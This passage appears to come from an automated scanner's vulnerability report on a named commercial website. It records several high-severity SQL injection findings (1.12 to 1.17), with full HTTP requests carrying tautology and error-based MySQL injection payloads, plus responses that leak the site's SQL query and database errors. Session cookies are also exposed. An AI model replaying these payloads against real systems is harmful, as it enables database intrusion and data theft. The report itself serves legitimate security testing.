P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
e prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3'/'
   unio' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3'' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.12. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3&1'=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:18:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
oject_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3&1'=1' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId=' OR 'ns'='ns&iusrc=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/leadflow/hins00/project.php?catId='' at line 5

Request 2

GET /ppc/leadflow/hins00/leadflow/hins00/project.php?catId='+OR+'ns'%3d'ns&iusrc=3&1''=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; __utma=253555158.1232491105.1300018899.1300018899.1300065868.2

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:18:58 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.13. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow'/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow''/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:26 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.14. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00'/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00''/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:20:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.15. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php'?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:21:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php''?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:21:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.16. http://www.insideup.com/ppc/leadflow/hins00/project.php [catId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002'&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002'&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002''&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.17. http://www.insideup.com/ppc/leadflow/hins00/project.php [iusrc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:51 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
,concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27'' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
